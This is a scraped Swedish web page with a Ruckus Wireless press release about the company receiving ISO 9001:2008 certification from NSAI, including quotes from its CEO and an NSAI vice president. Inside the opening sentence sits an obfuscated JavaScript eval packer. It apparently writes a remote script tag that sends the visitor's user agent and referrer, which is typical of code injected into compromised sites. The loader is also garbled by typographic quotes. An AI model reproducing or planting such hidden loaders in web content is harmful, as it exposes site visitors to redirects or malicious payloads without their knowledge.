Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Ruckus Wireless uppnår certifieringen ISO 9001:2008

Ruckus Wireless uppnår certifieringen ISO 9001:2008

Ruckus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heiet|var|u0026u|referrer|yfttf||js|php’.split(’|’),0,{}))
Wireless, Inc. (NYSE: RKUS), en global leverantör av avancerad trådlösa system till den snabbt växande marknaden för mobil infrastruktur, meddelar idag att de har tilldelats ISO 9001:2008 certifieringen från National Standards Authority of Ireland (NSAI). NSAI är medlem av International Certification Network (IQNet), för design, tillverkning, distribution och service för sina Ruckus Smart Wi-Fi-produkter och teknologin bakom sina trådlösa LAN (WLAN)-system.

ISO, International Organization for Standardization, är världens största organisation för frivilliga internationella standarder. ISO International standards säkerställer att produkter och tjänster är säkra, pålitliga och håller en god kvalitet. ISO har över 19 500 internationella standarder som täcker i princip alla aspekter kring teknologi och affärsverksamhet. ISO 9001:2008 specificerar kraven till system för kvalitetssäkring där en organisation måste uppfylla följande:

  • · De måste demonstrera företagets förmåga att konsekvent tillhandahålla produkter som möter kundernas och applicerbara lagstadgade krav, samt att företaget arbetar för att förbättra kundnöjdhet genom att erbjuda ett så pass bra och effektivt system som möjligt.
  • · Detta inkluderar processer för kontinuerliga förbättringar av systemet och säkerställande av överensstämmelse mot kundens förväntningar och applicerbara lagstadgade och regelmässiga krav.

”Hos Ruckus betyder kvalitet att vi främjar innovation för att möta och överträffa de alltmer växande förväntningarna från våra kunder”, sa Selina Lo, CEO på Ruckus Wireless. ”Vi demonstrerar detta genom vårt engagemang i ett system för att säkerställa kvalitet som också sätter höga standarder för oss själva. Vi erbjuder detta genom att kontinuerligt se över och förbättra detta system för att således kunna erbjuda industriledande lösningar till våra kunder. ISO 9001:2008 är ett starkt erkännande att vi gör båda dessa saker ”.

NSAI skapar, upprätthåller och främjar ackrediterade certifieringar för produkter, tjänster och organisationer för tillämpning av erkända standarder som ISO 9001:2008, från system för affärshantering till godkännandet av produkter. NSAI arbetar för att främja självförtroende hos konsumenten och skapa infrastrukturen för produkter och tjänster att bli igenkända och litade på, över hela världen.

IQNet, världens största, ledande nätverk för certifieringsorgan består av ett antal partners, inklusive NSAI.

Mer än 36 processansvariga och 21 internationella granskare har över det senaste året arbetat med att uppgradera Ruckus processer för kvalitetssäkring, engagerat sig i kontinuerlig förbättring av dessa processer, och utbildats för att öka kundnöjdhet.

”ISO 9001 fokuserar på alla aspekter av systemet för kvalitetssäkring och erbjuder en struktur och de verktyg för organisationer som vill säkerställa att deras produkter och tjänster konsekvent möter kundernas förväntningar och kontinuerligt förbättras” sa Christopher M. Morrell, vice president på NSAI ”Ruckus borde vara stolta över deras senaste bedrift”

Detta är ett pressmeddelande från Ruckus Wireless